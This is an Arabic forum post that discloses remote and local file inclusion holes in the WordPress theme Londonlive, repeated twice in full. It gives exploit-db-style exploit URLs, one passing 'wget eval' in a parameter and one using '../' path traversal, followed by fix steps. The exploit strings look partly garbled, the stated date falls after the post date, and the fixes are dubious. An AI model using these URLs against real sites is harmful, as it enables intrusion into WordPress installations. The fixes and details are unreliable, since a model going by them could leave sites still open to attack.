Ace
05-15-2012, 04:06 AM
السلام عليكم ورحمة الله تعالى وبركاته :-
كيفكم شباب , ان شاء الله بخير :redface:
قمت بي اكتشاف ثغرة RFi & LFi في قالب لي الورد برس Londonlive المعرب تفضلو الثغرة مع الترقيع :
# Exploit Title: Wordpress themes (Londonlive)====> RFI & LFI
# Google Dork: you do it :P
# Date: 2012/5/31
# Author: ACe
# Version: v1.2
# Tested on: win 7
# email:[email protected]
# greetings to : pSyCh0_3D , Fontom
#RFI exploit#
http://localhost/wp-content/themes/Londonlive/functions.php?local_file= wget eval
#LFI exploit#
http://localhost/wp-content/themes/Londonlive/scripts/functions/admin_panel_functions.php?page.=../index
#how to fix LFI exploit #
search for ($page.) and replace with ('../../..';) in /scripts/functions/admin_panel_functions.php then save.
#how to fix RFI exploit #
go to /themes/Londonlive/ and open functions.php and define the variable ($local_file) like this
$local_file="./";
#thinks god for makeing me stronger :)
كيفكم شباب , ان شاء الله بخير :redface:
قمت بي اكتشاف ثغرة RFi & LFi في قالب لي الورد برس Londonlive المعرب تفضلو الثغرة مع الترقيع :
# Exploit Title: Wordpress themes (Londonlive)====> RFI & LFI
# Google Dork: you do it :P
# Date: 2012/5/31
# Author: ACe
# Version: v1.2
# Tested on: win 7
# email:[email protected]
# greetings to : pSyCh0_3D , Fontom
#RFI exploit#
http://localhost/wp-content/themes/Londonlive/functions.php?local_file= wget eval
#LFI exploit#
http://localhost/wp-content/themes/Londonlive/scripts/functions/admin_panel_functions.php?page.=../index
#how to fix LFI exploit #
search for ($page.) and replace with ('../../..';) in /scripts/functions/admin_panel_functions.php then save.
#how to fix RFI exploit #
go to /themes/Londonlive/ and open functions.php and define the variable ($local_file) like this
$local_file="./";
#thinks god for makeing me stronger :)